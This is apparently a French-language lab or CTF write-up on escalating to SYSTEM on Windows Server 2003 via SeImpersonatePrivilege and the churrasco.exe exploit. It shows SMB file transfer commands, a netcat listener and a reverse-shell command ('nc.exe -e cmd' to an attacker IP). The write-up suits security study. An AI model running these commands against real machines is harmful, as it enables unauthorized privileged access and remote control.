# Windows Server 2003 (Kernel Exploitation)

### Explotation du Kernel - Windows Server 2003

À l'aide de la commande `systeminfo`, nous constatons que l'équipement est très ancien (Windows Server 2003) :

```bash
systeminfo
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FWLIGzq48yXRcRnwzP3Vg%2Fimage.png?alt=media&#x26;token=20202036-0fec-40f8-b26d-5faf6e23f905" alt=""><figcaption></figcaption></figure>

Nous avons également le privilège `SeImpersonatePrivilege`, ce qui nous permet de tenter une élévation de privilèges.

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FmnLMFZ1cBNd6Ka1VaJe0%2Fimage.png?alt=media&#x26;token=00868e45-9e84-4e00-a634-29cbf52d7a9b" alt=""><figcaption></figcaption></figure>

Pour contourner cette limitation, nous allons utiliser l'outil **churrasco.exe**.

{% embed url="<https://github.com/Re4son/Churrasco/raw/master/churrasco.exe>" %}

**Transfert de fichier Windows (SMB)**

> Nous utilisons **smbserver.py** pour partager un répertoire contenant le fichier exploit 40627.exe Ce fichier est ensuite copié sur la machine cible.

```bash
smbserver.py share $(pwd) -smb2support
```

Depuis la machine cible, nous copions le fichier malveillant à l'aide de la commande SMB :

```bash
copy \\10.10.14.30\share\churrasco.exe churrasco.exe
```

Nous pouvons alors exécuter n'importe quelle commande avec ce binaire, par exemple :

```powershell
.\churrasco.exe "whoami"
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F8rGOeTPAfhlRAzzuuzXr%2Fimage.png?alt=media&#x26;token=49c6bc84-5c86-4ea9-bcd9-ab1fbbcf8a9c" alt="" width="563"><figcaption></figcaption></figure>

**Établir une reverse shell**

Pour établir une reverse shell, nous écoutons sur le port 443 :

```bash
sudo rlwrap nc -nvlp 443
```

Nous créons à nouveau un serveur SMB avec **nc.exe** :

```bash
smbserver.py share $(pwd) -smb2support
```

Enfin, nous exécutons la reverse shell avec la commande suivante :

```bash
.\churrasco.exe "\\10.10.14.30\share\nc.exe -e cmd 10.10.14.30 443"
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FRaA9kpHORb6mFkNBY8y3%2Fimage.png?alt=media&#x26;token=2630db08-863a-4117-ba41-f4df998ec28d" alt=""><figcaption></figcaption></figure>
